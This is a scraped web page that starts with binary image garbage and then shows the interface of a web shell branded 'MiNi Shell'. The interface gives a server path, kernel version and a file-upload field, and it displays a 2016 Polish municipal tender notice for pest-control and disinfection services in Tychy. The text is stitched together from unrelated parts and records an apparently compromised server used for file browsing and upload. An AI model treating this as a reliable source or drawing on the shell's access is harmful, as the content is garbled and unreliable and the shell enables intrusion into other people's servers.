JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160216/34286-N-2016.html

<p class="kh_header"><b>Tychy: Świadczenie usług w zakresie dezynfekcji, dezynsekcji ,deratyzacji i dezodoryzacji
     w nieruchomościach i lokalach gminy administrowanych przez Miejski Zarząd Budynków 
     Mieszkalnych w Tychach.</b><br>
<b>Numer ogłoszenia: 34286 - 2016; data zamieszczenia: 16.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> W</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie dezynfekcji, dezynsekcji ,deratyzacji i dezodoryzacji
     w nieruchomościach i lokalach gminy administrowanych przez Miejski Zarząd Budynków 
     Mieszkalnych w Tychach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest utrzymanie w należytym stanie sanitarno - porządkowym 
     nieruchomości i lokali gminy, którymi w imieniu Zamawiającego administruje Miejski Zarząd 
     Budynków Mieszkalnych w Tychach, poprzez swoje jednostki organizacyjne zwane dalej 
     ROM- em, a to:  
     -   ROM Nr I   z siedzibą w Tychach przy ul. Arkadowej 9c 
     -   ROM Nr II  z siedzibą w Tychach przy ul. Budowlanych 41
     -   ROM Nr III z siedzibą w Tychach przy ul. Cyganerii 43
     -   ROM Nr IV z siedzibą w Tychach przy al. Niepodległości 76 
     -   ROM Nr V  z siedzibą w Tychach przy ul. Budowlanych 41 

2.	Zakres zamówienia obejmuje wykonywanie dezynfekcji , dezynsekcji , deratyzacji 
i dezodoryzacji oraz likwidację gniazd szerszeni i os w budynkach, lokalach mieszkalnych i na terenach nieruchomości Gminy Miasta Tychy 
3.	Wykaz adresów nieruchomości gminy administrowanych przez poszczególne komórki organizacyjne  MZBM zawierają załączniki do umowy nr  2/ ROM I ÷V.
4.	 Średnioroczną ilość usług ze wskazaniem jednostek miary dla usług dotyczących dezynfekcji , 
      dezynsekcji, deratyzacji i dezodoryzacji oraz likwidację gniazd szerszeni i os zawiera formularz
      oferty cenowej stanowiący załącznik nr 1a do SIWZ.
5.	 Realizacja  wszystkich usług odbywać się będzie na podstawie przekazywanych Wykonawcy 
    pisemnych zleceń (wzór zlecenia stanowi załącznik nr 2 do wzoru umowy). 
6.	 Wykonawca zobowiązany będzie do stosowania najbezpieczniejszych i najskuteczniejszych
środków chemicznych posiadających stosowne pozwolenia Ministra Zdrowia i Opieki Zdrowotnej (MZiOS), atesty Państwowego Zakładu Higieny (PZH) , respektowane na terenie Unii Europejskiej.
7.	 Rekomendowane przez Zamawiającego środki to:  alfasekt 050 s.c., deltaria plus , 
     alfasekt plus, aspermet 200ec, attracide 26 s.c. 
8.	 Zamawiający dopuszcza stosowanie przez Wykonawcę środków chemicznych równoważnych 
    o właściwościach nie gorszych niż środki rekomendowane przez Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia z wolnej 
        ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na 
        zasadach określonych w art. 67 ust.1 pkt 6) ustawy - PZP.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.92.10.00-9, 90.92.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości:                              
4 000,00 zł (słownie: cztery tysiące złotych zero groszy) - na czas związania ofertą. 
2.	Wadium musi być wniesione przed upływem terminu składania ofert.
3.	Przy wnoszeniu wadium Wykonawca winien powołać się na nazwę przetargu.
4.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu:
wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
                                 Bank Pekao S.A.
                                 Nr rachunku bankowego: 86 1240 2975 1111 0010 6583 2252
Wadium wniesione w formie pieniężnej musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,                    
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dn. 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 , z późn. zm.).
5.	W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia  wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, w Tychach przy ul. Filaretów 31 w Dziale Księgowości (pokój nr 4),</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu 
dokonywania spełniania warunku udziału w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący posiadania wiedzy 
         i doświadczenia (art. 22 ust.1 pkt 2) ustawy PZP), Zamawiający wymaga złożenia            
         następujących dokumentów:
   1)   wykaz wykonanych, a przypadku świadczeń okresowych lub ciągłych również  
       wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu 
       składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz 
       z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi 
       zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane 
       należycie. 
         Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał lub 
         wykonuje w ramach jednej umowy co najmniej 1 usługę zrealizowaną w zamieszkałych 
         budynkach mieszkalnych obejmującą swym zakresem wykonanie dezynfekcji, dezynsekcji , 
         deratyzacji i dezodoryzacji itp. o wartości wykonanych usług min. 40 000,00 zł (brutto). 

       Wykaz usług należy sporządzić wg wzoru druku stanowiącego załącznik nr 3 do SIWZ.
      (W przypadku podmiotów występujących wspólnie w/w warunki udziału wykonawcy mogą spełniać 
       łącznie lub co najmniej jeden z Wykonawców).    
2)   Do wykazu usług należy dołączyć dowody potwierdzające, że usługi zostały wykonane 
      lub są wykonywane należycie. 
       Dowodami , o których mowa powyżej są:
   a)  poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub         
        ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem 
        terminu składania ofert;
b)  oświadczenie wykonawcy jeżeli z uzasadnionych przyczyn o obiektywnym charakterze 
      wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w lit. a) powyżej.      
1.2.1	W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi zostały 
     wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania poświadczeń, 
     o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu 
dokonywania spełniania warunku udziału w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek udziału dotyczący dysponowania
        osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) 
        Zamawiający żąda następujących dokumentów:
        Wykaz osób , które będą uczestniczyć w wykonywaniu zamówienia, w szczególności 
        odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich 
        kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania  
        zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją  
        o podstawie dysponowania tymi osobami.
        Wymagane jest dysponowanie osobą /osobami zdolnymi do wykonania zamówienia,
         w szczególności:
         -  co najmniej jedną osobą posiadającą  kwalifikacje do wykonywania usług w zakresie 
             deratyzacji np. certyfikat ukończenia szkolenia z zakresu deratyzacji , 
        -   co najmniej jedną osobą  posiadającą kwalifikacje do wykonywania usług w zakresie 
             dezynsekcji np. certyfikat ukończenia szkolenia z zakresu dezynsekcji,
        -   co najmniej jedną osobą posiadającą kwalifikacje do wykonywania usług w zakresie 
             dezynfekcji , np. certyfikat ukończenia szkolenia z zakresu dezynsekcji.
   (W przypadku podmiotów występujących wspólnie warunek ten może spełniać co najmniej jeden z   
   Wykonawców)
        Wykaz osób należy sporządzić wg wzoru druku stanowiącego załącznik nr 4 do SIWZ.


2)  Oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają 
           wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
          Oświadczenie należy sporządzić wg wzoru stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  Wykonawca spełnia warunek udziału dotyczący posiadania 
       wymaganej sytuacji ekonomicznej i finansowej (art. 22 ust. 1 pkt  4) ustawy PZP), 
       Zamawiający wymaga, złożenia następujących dokumentów: 

	opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że 
      Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
      działalności związanej z przedmiotem zamówienia.
       Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ww. 
       dokument o wartości ubezpieczenia nie mniejszej niż 180 000,00 zł (sto osiemdziesiąt 
       tysięcy złotych zero groszy).
       Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia musi 
       wynikać z treści dokumentu polisy.
       Jeżeli fakt opłacenia polisy potwierdzającego, że Wykonawca jest ubezpieczony od 
       odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem 
       zamówienia, nie wynika wprost z załączonego do oferty dokumentu Wykonawca jest 
       zobowiązany dołączyć inny dokument potwierdzający opłacenie składki (np. kopia przelewu  
       składki, potwierdzenie ubezpieczyciela).

        (W przypadku podmiotów występujących wspólnie niniejszy warunek udziału podmioty mogą spełniać    
        łącznie lub co najmniej jeden podmiot).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez 
           Zamawiającego w rozdziale II ust. II pkt 6,7,8 SIWZ Zamawiający żąda następujących 
           dokumentów , tj.: 
        wymaganych prawem atestów i pozwoleń świadczących o tym, że wskazane w formularzu
oferty cenowej  środki chemiczne do realizacji usług dezynfekcji, dezynsekcji , 
        deratyzacji i dezodoryzacji odpowiadają aktualnym wymogom i , że są dopuszczone do  
        stosowania w obiektach przewidzianych na pobyt ludzi i respektowane przez UE.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy 
     w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy 
     w następujących przypadkach:
1)	   zmian personalnych, adresowych, formy prawnej stron umowy,
2)	   zmiany osoby/osób odpowiedzialnych za realizację przedmiotu umowy;
3)	zmiany podwykonawcy w trakcie trwania umowy - za zgodą Zamawiającego;
4)	zmiany wynagrodzenia należnego Wykonawcy, w przypadku zmiany: 
           a)  stawki podatku od towarów i usług, 
           b)  wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.3-5
                ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, 
           c)  zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub
                wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, 
           -   jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. 
           Zmianę wysokości wynagrodzenia Wykonawcy, o których mowa w ust. 6 pkt 4) lit. a) ÷ c) 
           należy rozumieć jako możliwość zarówno jego zwiększenia, jak i zmniejszenia. Zmiana 
           będzie dopuszczalna wówczas , gdy w terminie do 30 dni od wejścia w życie przepisów 
           zmieniających podatek VAT, wysokość płacy minimalnej, wysokość składek ZUS, strona 
           umowy zwróci się do drugiej strony z wnioskiem o przeprowadzenie negocjacji w sprawie 
           odpowiedniej zmiany wynagrodzenia.
5)	  zmiany wynagrodzenia należnego Wykonawcy na skutek indeksacji cen jednostkowych 
     wskazanych w formularzu oferty cenowej Wykonawcy, które mogą być indeksowane 
     w cyklach rocznych maksymalnie do wysokości średniorocznego wskaźnika wzrostu cen  
     towarów i usług konsumpcyjnych ogłoszonego przez Prezesa Gus w Monitorze Polskim 
     za rok poprzedni, jednak nie wcześniej niż po roku obowiązywania umowy - na pisemny     
     wniosek Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzbm.tychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2016 godzina 10:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com